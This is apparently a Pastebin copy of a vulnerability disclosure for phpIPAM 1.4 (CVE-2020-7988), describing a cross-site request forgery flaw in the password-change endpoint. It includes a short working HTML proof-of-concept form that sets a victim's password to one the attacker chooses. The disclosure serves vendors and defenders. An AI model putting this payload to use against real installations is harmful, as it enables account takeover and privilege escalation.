Guest User

Untitled

a guest
Mar 4th, 2020
1,498
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1.  
  2. > [Suggested description]
  3. > An issue was discovered in tools/pass-change/result.php in phpIPAM 1.4.
  4. > CSRF can be used to change the password of any user/admin, to
  5. > escalate privileges, and to gain access to more data and functionality. This issue exists
  6. > due to the lack of a requirement to provide the old password, and the lack of security
  7. > tokens.
  8. >
  9. > ------------------------------------------
  10. >
  11. > [Additional Information]
  12. > I've sent to the vendor with the vulnerability details but haven't received any reply yet.
  13. >
  14. > CSRF POC:
  15. >
  16. > <html>
  17. > <body>
  18. > <script>history.pushState('', '', '/')</script>
  19. > <form action="http://hostname/app/tools/pass-change/result.php" method="POST">
  20. > <input type="hidden" name="ipampassword1" value="attackers_password" />
  21. > <input type="hidden" name="ipampassword2" value="attackers_password" />
  22. > <input type="submit" value="Submit request" />
  23. > </form>
  24. > </body>
  25. > </html>
  26. >
  27. > ------------------------------------------
  28. >
  29. > [Vulnerability Type]
  30. > Cross Site Request Forgery (CSRF)
  31. >
  32. > ------------------------------------------
  33. >
  34. > [Vendor of Product]
  35. > phpIPAM
  36. >
  37. > ------------------------------------------
  38. >
  39. > [Affected Product Code Base]
  40. > phpIPAM - 1.4
  41. >
  42. > ------------------------------------------
  43. >
  44. > [Affected Component]
  45. > result.php
  46. >
  47. > ------------------------------------------
  48. >
  49. > [Attack Type]
  50. > Remote
  51. >
  52. > ------------------------------------------
  53. >
  54. > [Impact Escalation of Privileges]
  55. > true
  56. >
  57. > ------------------------------------------
  58. >
  59. > [CVE Impact Other]
  60. > Account Takeover
  61. >
  62. > ------------------------------------------
  63. >
  64. > [Attack Vectors]
  65. > Crafting a post request in a button with the new password and luring the victim to click it.
  66. >
  67. > ------------------------------------------
  68. >
  69. > [Reference]
  70. > https://phpipam.net/news/phpipam-v1-5-released/
  71. >
  72. > ------------------------------------------
  73. >
  74. > [Discoverer]
  75. > Khalid Amin https://hackerone.com/khalidamin
  76.  
  77. CVE-2020-7988.
RAW Paste Data